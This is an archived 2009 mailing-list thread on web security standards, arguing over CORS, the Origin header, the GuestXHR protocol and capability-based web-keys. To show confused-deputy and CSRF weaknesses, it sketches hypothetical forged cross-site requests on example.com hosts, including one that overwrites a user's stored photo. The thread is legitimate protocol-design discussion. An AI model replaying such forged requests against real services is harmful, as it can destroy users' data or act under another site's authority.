For those interested, I've argued in favor of secret token in the URL at:

http://waterken.sf.net/web-key

 Another issue: how does Server B defend against a CSRF vulnerability in
 receiving the shared secret from Server A? It seems like a page from any
 server could send it an invalid shared secret at any time, thus breaking
 Server B's ability to access Server A.

.. assuming Server B is willing to silently overwrite its current
state with the new invalid secret. That would be a poor choice. For
clarity, I've expanded the description of what Server B could do to
avoid such attack scenarios.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: CSRF vulnerability in Tyler's GuestXHR protocol?

2009-11-10 Thread Tyler Close
I've elaborated on the example at:

http://sites.google.com/site/guestxhr/maciej-challenge

I've tried to include all the information from our email exchange.
Please let me know what parts of the description remain ambiguous.

Just so that we're on the same page, the prior description was only
meant to give the reader enough information to see that the scenario
is possible to implement under Maciej's stated constraints. I expected
the reader to fill in their favored technique where that choice could
be done safely in many ways. Many of the particulars of the design
(cookies vs URL arguments, 303 vs automated form post, UI for noting
conflicts) can be done in several different ways and the choice isn't
very relevant to the current discussion. All that said, I'm happy to
fill out the scenario with as much detail as you'd like, if that helps
us reach an understanding.

--Tyler

On Thu, Nov 5, 2009 at 8:31 PM, Adam Barth w...@adambarth.com wrote:
 You seem to be saying that your description of the protocol is not
 complete and that you've left out several security-critical steps,
 such as

 1) The user interface for confirming transactions.
 2) The information the server uses to figure out which users it is talking to.

 Can you please provide a complete description of your protocol with
 all the steps required?  I don't see how we can evaluate the security
 of your protocol without such a description.

 Thanks,
 Adam


 On Thu, Nov 5, 2009 at 12:05 PM, Tyler Close tyler.cl...@gmail.com wrote:
 Hi Adam,

 Responses inline below...

 On Thu, Nov 5, 2009 at 8:56 AM, Adam Barth w...@adambarth.com wrote:
 Hi Tyler,

 I've been trying to understand the GuestXHR protocol you propose for
 replacing CORS:

 http://sites.google.com/site/guestxhr/maciej-challenge

 I don't understand the message in step 5.  It seems like it might have
 a CSRF vulnerability.  More specifically, what does the server do when
 it receives a GET request for https://B/got?A=secret123?

 Think of the resource at /got as like an Inbox for accepting an add
 event permission from anyone. The meta-variable A in the query
 string, along with the secret, is the URL to send events to. So a
 concrete request might look like:

 GET /got?site=https%3%2F%2Fcalendar.example.coms=secret123
 Host: upcoming.example.net

 When upcoming.example.net receives this request, it might:

 1) If no association for the site exists, add it
 2) If an existing association for the site exists respond with a page
 notifying the user of the collision and asking if it should overwrite
 or ignore.

 Notice that step 6 is a response from Site B back to the user's browser.

 Alternatively, the response in step 6 could always be a confirmation
 page asking the user to confirm any state change that is about to be
 made. So, the page from the upcoming event site might say:

 I just received a request to add a calendar to your profile. Did you
 initiate this request? yes no

 Note that such a page would also be a good place to ask the user for a
 petname for the new capability, if you're into such things, but I
 digress...

 The slides say Associate user,A with secret123.  That sounds like
 server B changes state to associate secret123 with the the pair (user,
 A).  What stops an attacker from forging a cross-site request of the
 form https://B/got?A=evil123?

 In the design as presented, nothing prevents this. I considered the
 mitigation presented above sufficient for Maciej's challenge. If
 desired, we could tighten things up, without resorting to an Origin
 header, but I'd have to add some more stuff to the explanation.

  Won't that overwrite the association?

 That seems like a bad idea.

 There doesn't seem to be anything in the protocol that binds the A
 in that message to server A.

 The A is just the URL for server A.

 More generally, how does B know the message https://B/got?A=secret123
 has anything to do with user?  There doesn't seem to be anything in
 the message identifying the user.  (Of course, we could use cookies to
 do that, but we're assuming the cookie header isn't present.)

 This request is just a normal page navigation, so cookies and such
 ride along with the request. In the diagrams, all requests are normal
 navigation requests unless prefixed with GXHR:.

 We used these normal navigation requests in order to keep the user
 interface and network communication diagram as similar to Maciej's
 solution as possible. If I were approaching this problem without that
 constraint, I might do things differently, but that wasn't the goal of
 this exercise.

 Can you help me understand how the protocol works?

 My pleasure. Please send along any follow up questions.

 (I would have chosen a different Subject field for these questions though)

 P.S., It also seems that the protocol does not comply with the HTTP
 specification because the server changes state in response to a GET
 request.  Presumably, you mean to use a 307 redirect and a POST
 request

Re: CORS Background slides

2009-11-09 Thread Tyler Close
On Wed, Nov 4, 2009 at 5:57 PM, Maciej Stachowiak m...@apple.com wrote:
 5) I would summarize the tradeoff between this mechanism for a simple
 cross-site communication scenario vs. the CORS way to do it as follows:

    a) In the CORS-based protocol, if you change the scenario in a way that
 violates the DBAD discipline, you may introduce a CSRF-like vulnerability.
 In other words, making a programming error that violates DBAD can introduce
 a vulnerability into the system.

    b) In the GuestXHR-based protocol, if you make a programming error in
 generating or maintaining the confidentiality of the shared secret, you may
 introduce a CSRF-like vulnerability.

Just to clarify the terminology, if the shared secret leaked, the
resulting attack would not be CSRF-like, but rather would be a direct
use of a stolen secret key. The situation is analogous to an attacker
somehow reading the victim site's cookies in solution a), and then
making direct use of them. In a CSRF-like attack, the attacker never
obtains direct knowledge of a secret key, but instead causes a deputy
to issue requests on behalf of the attacker.

 6) Combining the shared secret mechanism with the Origin/Cookie mechanism
 increases overall security of the solution. Then you have to make *both* an
 error in violating DBAD and in management of the shared secret to create a
 vulnerability. Making only one of these mistakes will not introduce a
 CSRF-like vulnerability. Thus, running the proposed protocol over XHR2+CORS
 provides defense in depth relative to the GuextXHR-based solution.


 Combining 5 and 6, the risk of programming errors with CORS-only solutions
 has to be weighed against the risk of programming errors in shared-secret
 solutions plus the loss of the ability to create defense in depth by
 combining Origin/Cookie checks with a shared secret.

I'm still unclear on how you intend to provide defense in depth by
using Origin. You are right that there's more that can be done to
reduce the risk of programming with shared-secrets though. A lot can
be done without any browser support. For example, see the security
model for my web_send JavaScript library:

http://waterken.sourceforge.net/web_send/#securityModel

In this library, shared secrets are held in URLs, which are in turn
only exposed to JavaScript code as opaque objects. Since the
JavaScript code never gets direct access to the shared secrets, it is
unable to accidentally, or even maliciously, leak the secrets. There's
no need to study this library for the purposes of this discussion. It
just provides an example of how programming with shared secrets can be
made pleasant and safe.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: CSRF vulnerability in Tyler's GuestXHR protocol?

2009-11-05 Thread Tyler Close
Hi Adam,

Responses inline below...

On Thu, Nov 5, 2009 at 8:56 AM, Adam Barth w...@adambarth.com wrote:
 Hi Tyler,

 I've been trying to understand the GuestXHR protocol you propose for
 replacing CORS:

 http://sites.google.com/site/guestxhr/maciej-challenge

 I don't understand the message in step 5.  It seems like it might have
 a CSRF vulnerability.  More specifically, what does the server do when
 it receives a GET request for https://B/got?A=secret123?

Think of the resource at /got as like an Inbox for accepting an add
event permission from anyone. The meta-variable A in the query
string, along with the secret, is the URL to send events to. So a
concrete request might look like:

GET /got?site=https%3%2F%2Fcalendar.example.coms=secret123
Host: upcoming.example.net

When upcoming.example.net receives this request, it might:

1) If no association for the site exists, add it
2) If an existing association for the site exists respond with a page
notifying the user of the collision and asking if it should overwrite
or ignore.

Notice that step 6 is a response from Site B back to the user's browser.

Alternatively, the response in step 6 could always be a confirmation
page asking the user to confirm any state change that is about to be
made. So, the page from the upcoming event site might say:

I just received a request to add a calendar to your profile. Did you
initiate this request? yes no

Note that such a page would also be a good place to ask the user for a
petname for the new capability, if you're into such things, but I
digress...

 The slides say Associate user,A with secret123.  That sounds like
 server B changes state to associate secret123 with the the pair (user,
 A).  What stops an attacker from forging a cross-site request of the
 form https://B/got?A=evil123?

In the design as presented, nothing prevents this. I considered the
mitigation presented above sufficient for Maciej's challenge. If
desired, we could tighten things up, without resorting to an Origin
header, but I'd have to add some more stuff to the explanation.

  Won't that overwrite the association?

That seems like a bad idea.

 There doesn't seem to be anything in the protocol that binds the A
 in that message to server A.

The A is just the URL for server A.

 More generally, how does B know the message https://B/got?A=secret123
 has anything to do with user?  There doesn't seem to be anything in
 the message identifying the user.  (Of course, we could use cookies to
 do that, but we're assuming the cookie header isn't present.)

This request is just a normal page navigation, so cookies and such
ride along with the request. In the diagrams, all requests are normal
navigation requests unless prefixed with GXHR:.

We used these normal navigation requests in order to keep the user
interface and network communication diagram as similar to Maciej's
solution as possible. If I were approaching this problem without that
constraint, I might do things differently, but that wasn't the goal of
this exercise.

 Can you help me understand how the protocol works?

My pleasure. Please send along any follow up questions.

(I would have chosen a different Subject field for these questions though)

 P.S., It also seems that the protocol does not comply with the HTTP
 specification because the server changes state in response to a GET
 request.  Presumably, you mean to use a 307 redirect and a POST
 request.  Unfortunately, that means the protocol will generate a
 warning dialog in Firefox and will fail completely in Safari 4.

I just said 303 because it was the most succinct way of expressing the
relevant part of the communication. In deployment, a better solution
would be to send back a normal 200 response with JavaScript code that
does an automated form POST of the same data to Server B.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [cors] unaddressed security concerns

2009-11-05 Thread Tyler Close
Hi Maciej,

Responses inline below...

On Wed, Nov 4, 2009 at 9:36 PM, Maciej Stachowiak m...@apple.com wrote:

 On Nov 3, 2009, at 5:33 PM, Tyler Close wrote:
 On Mon, Oct 12, 2009 at 7:19 AM, Maciej Stachowiak m...@apple.com wrote:

 As a side note, I should add that Tyler's scenario would be much simpler
 overall if printer.example.net used a grant of read access to the photo
 it
 wants to print on storage.example.org, instead of granting write access
 to a
 new location.

 In this scenario, photo.example.com has the opportunity to take the
 role of attacker in a CSRF-like attack. In the legitimate case,
 photo.example.com is expected to send a URL to printer.example.net
 which identifies the photo to be printed, such as
 http://storage.example.org/photo123. In the attack case,
 photo.example.com could send the URL that identifies the
 printer.example.net client list, such as
 http://storage.example.org/clients123. Consequently,
 photo.example.com receives a print out of the printer.example.net
 client list, instead of a photo printout.

 What's the attack here? Is it information disclosure or vandalism?

The problem is information disclosure. My understanding of your
proposed design was that photo.example.com would grant read access
over a file to printer.example.net and send the file's URL to
printer.example.net. The printer.example.net would then use its own
credentials to read the file content, print it out and mail it to the
recipient. In the legitimate case, photo.example.com grants read
access to a photo file that it owns. In the attack case,
photo.example.com sends a URL for the printer.example.net client list.
The printer.example.net site already has permission to read its own
file, so it prints it out and mails it to the attacker.

Perhaps this design is not what you originally intended, but it was my
understanding from the original email:

http://www.w3.org/mid/5d7511b2-da9d-40af-a536-d799fb6ee...@apple.com

As a side note, I should add that Tyler's scenario would be much
simpler overall if printer.example.net used a grant of read access to
the photo it wants to print on storage.example.org, instead of
granting write access to a new location. Or it can just ask
photo.example.com to read the photo from storage.example.org and send
the actual data. Either of these much less abusable than writing, and
would be a safer approach, whether or not the overall design depends
on secret tokens. The grant of read access can be one-time or time-
limited if necessary. Thus, I think the scenario is somewhat
contrived. Likely cross-site interactions would not involve such a
complex process to transfer data. The root of the vulnerability in
Tyler's scenario is writing in a shared namespace to transfer data,
instead of simply granting read access to the existing copy, or
transferring the actual data bits.


Either way, this was an older email and I am happy to move on to
discuss your most current thinking on this topic.

 That being said, my understanding of this threat was greatly improved by the
 discussion at TPAC. I now think the best way to address multi-site
 collaboration is by applying the DBAD discipline. Here's how I would do it
 in this case:

 The storage service is designed to allow collaborative access by multiple
 sites, therefore it needs to let them distinguish their own requests from
 third-party requests. One way to do so is to partition resources such that
 each is owned by exactly one storage domain. The only way to share
 information cross-domain is to copy. Resource names include the domain that
 owns them. Then it offers the following command set (angle brackets are used
 to delimit metasyntactic variables):

 (This may be more complicated than needed, for the sake of clarity):

 Read from
   If the from resource is owned by the domain specified by Origin, return
 the data.

 Write to\n
 filedata
   If the from resource is owned by the domain specified by Origin, store
 filedata at the resource.

 SameDomainCopy from to
   from and to must be in the same domain and must match Origin.

 GetReadToken resource
   If the Origin header matches resource, return a one-time read token
 which can be used to copy a resource cross-domain

 GetWriteToken resource
   If the Origin header matches resource, return a one-time read token
 which can be used to copy a resource cross-domain

 CrossDomainCopy from-domain from-resource read-token to-domain
 to-resource write-token
    read-token must be a valid read token for from-resource, and
 from-resource must be owned by from-domain. write-token must be a
 valid write token for to-resource, and to-resource must be owned by
 to-domain. Origin must match at least one of from-domain or to-domain.

 This allows two sites to agree to copy a resource from one to the other on
 storage.exmple.org without introducing a confused deputy hazard.

 In the original scenario, photo.example.com would get a resource name and a
 write token from printer.example.net

Re: XHR and sandboxed iframes (was: Re: XHR without user credentials)

2009-06-26 Thread Tyler Close
On Thu, Jun 18, 2009 at 12:32 AM, Ian Hicksoni...@hixie.ch wrote:
 On Wed, 17 Jun 2009, Mark S. Miller wrote:
 
  I don't really understand what we're trying to prevent here.

 Confused deputies such as XSRF problems. Original paper is at 
 http://www.cis.upenn.edu/~KeyKOS/ConfusedDeputy.html. It's well worth
 rereading. Much deeper than it at first appears.

 Could you describe a concrete attack that you are concerned about? I don't
 really see how the article you cite applies here.


 Perhaps my own srl.cs.jhu.edu/pubs/SRL2003-02.pdf may help.

 The threads and links already cited should make the connection with
 browser security clear.

 Maybe I'm just too stupid for this job, but I don't understand the
 connection at a concrete level. I mean, I think understand the kind of
 threats we're talking about, but as far as I can tell, CORS takes care of
 them all.

The problem with redirects that is still outstanding against CORS is a
concrete example of the general Confused Deputy issues with CORS. A
redirect is just one way for a site to pass an identifier to code from
another site. Confused Deputy vulnerabilities will occur in CORS
whenever an identifier (such as a URI) is passed from one site to
another. For example...

 I'm not really sure what more to explain. Perhaps you could ask a more
 specific question?

 Could you show some sample code maybe that shows the specific threat you
 are concerned about?

Consider two web-applications: photo.example.com, a photo manager; and
printer.example.net, a photo printer. Both of these web-apps use
storage provided by storage.example.org. We're going to print a photo
stored at: https://storage.example.org/photo123

1. A page from photo.example.com makes request:

POST /newprintjob HTTP/1.0
Host: printer.example.net
Origin: photo.example.com

HTTP/1.0 201 Created
Content-Type: application/json

{ @ : https://storage.example.org/job123; }

2. To respond to the above request, the server side code at
printer.example.net set up a new printer spool file at
storage.example.org and gave photo.example.com write access to the
file.

3. The same page from photo.example.com then makes request:

POST /copydocument HTTP/1.0
Host: storage.example.org
Origin: photo.example.com
Content-Type: application/json

{
from : { @ : https://storage.example.org/photo123; },
to: { @ : https://storage.example.org/job123; }
}

HTTP/1.0 204 Ok

That's the expected scenario. Now, what happens if in step 1,
printer.example.net responds with URL
https://storage.example.org/photo456, another photo belonging to
photo.example.com. The POST in step 3 now looks like:

POST /copydocument HTTP/1.0
Host: storage.example.org
Origin: photo.example.com
Content-Type: application/json

{
from : { @ : https://storage.example.org/photo123; },
to: { @ : https://storage.example.org/photo456; }
}

HTTP/1.0 204 Ok

Consequently, one of the user's existing photos is overwritten with a
different photo.

The general point exemplified by the above scenario is that a site
cannot safely make a request that includes an identifier received from
a third-party, when access-control is based on the origin of a
request. The point of CORS is to enable sites to exchange messages.
These messages will include identifiers. When an identifier is taken
from a response and put into a request, a Confused Deputy
vulnerability is created by CORS. The redirect example is just an
automated way of doing this transfer of an identifier from a response
to a request. CORS could prevent such vulnerabilities by not
identifying the origin of requests.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: XHR and sandboxed iframes (was: Re: XHR without user credentials)

2009-06-26 Thread Tyler Close
Response inline below, so keep scrolling...

On Fri, Jun 26, 2009 at 3:41 PM, Ian Hicksoni...@hixie.ch wrote:
 On Fri, 26 Jun 2009, Tyler Close wrote:

 Consider two web-applications: photo.example.com, a photo manager; and
 printer.example.net, a photo printer. Both of these web-apps use storage
 provided by storage.example.org. We're going to print a photo stored at:
 https://storage.example.org/photo123

 1. A page from photo.example.com makes request:

     POST /newprintjob HTTP/1.0
     Host: printer.example.net
     Origin: photo.example.com

     HTTP/1.0 201 Created
     Content-Type: application/json

     { @ : https://storage.example.org/job123; }

 2. To respond to the above request, the server side code at
 printer.example.net set up a new printer spool file at
 storage.example.org and gave photo.example.com write access to the
 file.

 3. The same page from photo.example.com then makes request:

     POST /copydocument HTTP/1.0
     Host: storage.example.org
     Origin: photo.example.com
     Content-Type: application/json

     {
         from : { @ : https://storage.example.org/photo123; },
         to: { @ : https://storage.example.org/job123; }
     }

     HTTP/1.0 204 Ok

 That's the expected scenario. Now, what happens if in step 1,
 printer.example.net responds with URL
 https://storage.example.org/photo456, another photo belonging to
 photo.example.com. The POST in step 3 now looks like:

     POST /copydocument HTTP/1.0
     Host: storage.example.org
     Origin: photo.example.com
     Content-Type: application/json

     {
         from : { @ : https://storage.example.org/photo123; },
         to: { @ : https://storage.example.org/photo456; }
     }

     HTTP/1.0 204 Ok

 Consequently, one of the user's existing photos is overwritten with a
 different photo.

 The general point exemplified by the above scenario is that a site
 cannot safely make a request that includes an identifier received from a
 third-party, when access-control is based on the origin of a request.

 I don't understand why photo.example.com would trust the identifier from
 printer.example.net if the latter could be in the same namespace as the
 namespace photo.example.com uses for its own data.

Are you saying the two web-apps should not be allowed to use
storage.example.org?

 The problem there is
 simply one of trusting potentially hostile external input.

What input validation should photo.example.com have done?

Your above claim basically means a site cannot accept identifiers from
potentially hostile sites. That is true when using the ACL model (ie:
doing access control based on the origin of a request). I'm suggesting
we not use the ACL model, since it is broken in multi-party scenarios
like CORS.

I leave it as a simple exercise for the reader to redo the above
example using web-keys http://waterken.sf.net/web-key. The exchanged
messages have exactly the same format and there is no additional input
validation required. That's because the capability model actually
provides access control in multi-party scenarios.

 The point of CORS is to enable sites to exchange messages. These
 messages will include identifiers. When an identifier is taken from a
 response and put into a request, a Confused Deputy vulnerability is
 created by CORS. The redirect example is just an automated way of doing
 this transfer of an identifier from a response to a request. CORS could
 prevent such vulnerabilities by not identifying the origin of requests.

 I don't understand why this is any different in sandboxed iframes than
 anywhere else. I don't disagree that redirects complicate matters mildly,
 but that is the case regardless of whether there is a sandboxed iframe or
 not as far as I can tell. My point was that without the user credentials
 in the sandboxed origin, it would be impossible for the page to even get
 to the original photo data, let alone contact the printing site or the
 storage site and get them to print a photo.

There are no sandboxed iframes in this example. It's just a simple web
page from a single origin, using CORS for cross-origin resource
sharing. And it doesn't work. The scenario is not impossible to
implement. It is simple using web-keys. It is only impossible to
safely implement it using the CORS security model.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [cors] TAG request concerning CORS Next Step(s)

2009-06-24 Thread Tyler Close
On Wed, Jun 24, 2009 at 10:16 AM, Jonas Sickingjo...@sicking.cc wrote:
 Firefox 3.5 will be out in a matter of days (RC available already) and
 it supports the majority of CORS (everything but redirects of
 preflighted requests).

What is the behavior of the Origin header on other kinds of redirects?
For example:

1. page from Site A does: POST text/plain to a URL at Site B

2. Site B responds with a redirect to a URL at Site A

3. User clicks through any presented redirect confirmation dialog

4. Browser sends the POST from step 1 to the specified URL at Site A.

What is the value of the Origin header in step 4?

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [cors] TAG request concerning CORS Next Step(s)

2009-06-24 Thread Tyler Close
Hi Jonas,

I'm just asking what Origin header behavior will be shipped in Firefox
3.5. You've said redirects of preflighted requests aren't supported,
so I'm wondering about the non-preflighted requests.

Another question, since Firefox doesn't support redirects of
preflighted requests, what does it do when it encounters a redirect?

--Tyler

On Wed, Jun 24, 2009 at 12:43 PM, Jonas Sickingjo...@sicking.cc wrote:
 On Wed, Jun 24, 2009 at 11:45 AM, Tyler Closetyler.cl...@gmail.com wrote:
 On Wed, Jun 24, 2009 at 10:16 AM, Jonas Sickingjo...@sicking.cc wrote:
 Firefox 3.5 will be out in a matter of days (RC available already) and
 it supports the majority of CORS (everything but redirects of
 preflighted requests).

 What is the behavior of the Origin header on other kinds of redirects?
 For example:

 1. page from Site A does: POST text/plain to a URL at Site B

 2. Site B responds with a redirect to a URL at Site A

 3. User clicks through any presented redirect confirmation dialog

 4. Browser sends the POST from step 1 to the specified URL at Site A.

 What is the value of the Origin header in step 4?

 Which Origin are you referring to here?

 The Origin header defined by the CORS spec is known to be bad and is
 being worked on.  So I'm not sure it's interesting to discuss what the
 CORS spec says here. (At least that was the status last I looked, I'm
 a bit behind on the last few rounds of emails though).

 As for the Origin spec that Adam Barth is working on, I'm not sure
 that the last draft is published yet, but I believe that the idea is
 to append the full redirect chain in the Origin header. (hence
 possibly making it incompatible with the CORS Origin meaning that
 we'll have to use another name).

 So again, we do know there is a problem with the Origin header in the
 CORS spec when it comes to redirects. It's a known outstanding issue
 that we believe is fixable and not a reason to abandon the whole spec.

 / Jonas




-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [cors] TAG request concerning CORS Next Step(s)

2009-06-24 Thread Tyler Close
On Wed, Jun 24, 2009 at 1:37 PM, Jonas Sickingjo...@sicking.cc wrote:
 On Wed, Jun 24, 2009 at 12:52 PM, Tyler Closetyler.cl...@gmail.com wrote:
 Hi Jonas,

 I'm just asking what Origin header behavior will be shipped in Firefox
 3.5. You've said redirects of preflighted requests aren't supported,
 so I'm wondering about the non-preflighted requests.

 It will have the Origin header of the original request. We're
 considering blocking the request entirely for now though.

Meaning the POST request is delivered to Site A, with an Origin header
also identifying Site A, but with a Request-URI chosen by Site B. So
Site B can cause the POST request to be sent to any resource on Site A
and be processed under Site A's authority. I recommend against
shipping that algorithm.

Note that this scenario is just a special case of a more general
problem with the Origin proposal. Whenever a page issues a request
that includes data provided by a third site, that page is applying its
own authority to identifiers provided by the third site. This is the
essence of a CSRF attack (Confused Deputy). For example, if a page
from Site A does a GET to Site B and then includes a received
identifier in a subsequent POST to a site other than Site B, Site A is
vulnerable to a Confused Deputy attack by Site B. Since the whole
point of cross-origin requests is to enable this kind of passing of
information between sites, the Origin proposal is poorly suited for
access-control in these scenarios.

Again, see my paper ACLs don't http://waterken.sf.net/aclsdont/
for an in-depth explanation of why ACL model solutions, such as
Origin, can't solve this problem. The section on stack introspection
is especially relevant, as Origin is a degenerate form of stack
introspection.

 Another question, since Firefox doesn't support redirects of
 preflighted requests, what does it do when it encounters a redirect?

 It aborts and denies the original request. For XHR that means raising
 an error event.

It's worth wondering whether web pages will come to rely on these
requests being aborted and so be vulnerable should a future release
not abort the requests.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



  1   2   >